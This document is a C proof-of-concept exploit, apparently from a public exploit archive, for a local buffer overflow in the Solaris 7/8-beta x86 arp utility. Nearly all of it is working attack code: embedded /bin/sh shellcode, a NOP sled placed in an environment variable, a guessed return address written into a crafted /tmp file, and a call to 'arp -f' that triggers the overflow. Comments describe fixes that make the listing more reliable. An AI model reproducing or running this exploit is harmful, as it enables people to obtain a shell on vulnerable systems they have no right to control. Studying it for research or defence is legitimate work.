
# Title : Solaris 7 / 8-beta arp Local Overflow Exploit
# Published : 2001-01-15
# Author : ahmed


/*
   arp overflow proof of concept by ahmed@securityfocus.com
   shellcode originally written by Cheez Whiz.

   Tested on x86 Solaris 7 and 8 beta.  The defaults should work; if
   they do not, pass an offset as arg1 and vary it in steps of +/- 100.

   Note: this listing declares no headers.  Build it with <fcntl.h>,
   <stdio.h>, <stdlib.h>, <string.h> and <unistd.h> included, or accept
   the implicit-declaration warnings of an old compiler.

   Copyright Security-Focus.com, 11/2000
*/

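/*
 * Return the current stack pointer (its low 32 bits; the Solaris/x86
 * target is ILP32).  The original loaded %esp into %eax and then fell off
 * the end of the function, relying on the caller picking the value out of
 * the return register -- undefined behaviour in C.  The value is now
 * handed back through an asm output operand and returned explicitly.
 */
long get_esp(void)
{
  unsigned int sp;

  __asm__ __volatile__("movl %%esp, %0" : "=r"(sp));
  return (long)sp;
}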

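int main(int ac, char **av)
{
  /*
   * Cheez Whiz's Solaris/x86 shellcode; the trailing bytes spell "/bin/sh".
   * It holds no NUL byte, so strlen() yields its length.  (Earlier copies
   * of this listing had the backslashes of the \x escapes stripped, which
   * turned the payload into plain ASCII text; they are restored here.)
   */
  char shell[] =
    "\xeb\x45\x9a\xff\xff\xff\xff\x07\xff"
    "\xc3\x5e\x31\xc0\x89\x46\xb7\x88\x46"
    "\xbc\x88\x46\x07\x89\x46\x0c\x31\xc0"
    "\xb0\x2f\xe8\xe0\xff\xff\xff\x52\x52"
    "\x31\xc0\xb0\xcb\xe8\xd5\xff\xff\xff"
    "\x83\xc4\x08\x31\xc0\x50\x8d\x5e\x08"
    "\x53\x8d\x1e\x89\x5e\x08\x53\xb0\x3b"
    "\xe8\xbe\xff\xff\xff\x83\xc4\x0c\xe8"
    "\xbe\xff\xff\xff\x2f\x62\x69\x6e\x2f"
    "\x73\x68\xff\xff\xff\xff\xff\xff\xff"
    "\xff\xff";

  /*
   * Two 4-byte values planted inside the over-long field: a fixed address
   * at offset 52 (tuned for Solaris 7 / 8-beta on x86) and, at offset 76,
   * a guessed return address meant to land in the NOP sled carried by the
   * LOL= environment variable.  arg1, if given, shifts the latter.  Only
   * the low four bytes of each are copied, which is the whole value on the
   * ILP32 target.
   */
  unsigned long magic = 0x8047b78;
  unsigned long r = get_esp() + 600;
  unsigned char buf[300];        /* the over-long field written to the arp file */
  char env[sizeof(buf) + 1];     /* same size plus the NUL that putenv() needs */
  int shell_len;
  int f;
  int rc = 1;

  if (ac == 2)
    r += atoi(av[1]);

  /* Arp file line: four dummy tokens, then the field that overflows. */
  memset(buf, 0x61, sizeof(buf));
  memcpy(buf + 52, &magic, 4);
  memcpy(buf + 76, &r, 4);

  /*
   * Drop any stale copy, then create the file with O_EXCL so that an
   * existing file or symlink planted at this fixed /tmp name is refused
   * instead of being written through.  The original never checked this
   * open() (or the writes) and would have run arp against whatever was
   * there.
   */
  unlink("/tmp/ypx");
  f = open("/tmp/ypx", O_CREAT | O_EXCL | O_WRONLY, 0600);
  if (f < 0) {
    perror("open /tmp/ypx");
    return 1;
  }
  if (write(f, "1 2 3 4 ", 8) != 8 ||
      write(f, buf, sizeof(buf)) != (int)sizeof(buf)) {
    perror("write /tmp/ypx");
    close(f);
    goto out;
  }
  if (close(f) != 0) {
    perror("close /tmp/ypx");
    goto out;
  }

  /*
   * LOL=<NOP sled><shellcode>.  The original passed the unterminated
   * 300-byte buffer itself to putenv(), which then read past its end
   * looking for a NUL; env is one byte longer so the string is terminated
   * and the variable is exactly 300 bytes long.  env must outlive the
   * system() call below, which it does as a local of main().
   */
  shell_len = (int)strlen(shell);
  memset(env, 0x90, sizeof(buf));
  memcpy(env, "LOL=", 4);
  memcpy(env + sizeof(buf) - shell_len, shell, shell_len);
  env[sizeof(buf)] = '\0';
  if (putenv(env) != 0) {
    perror("putenv");
    goto out;
  }

  /* arp's parsing of the crafted file is what triggers the overflow. */
  if (system("/usr/sbin/arp -f /tmp/ypx") == -1)
    perror("system");
  else
    rc = 0;

out:
  unlink("/tmp/ypx");
  return rc;
}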

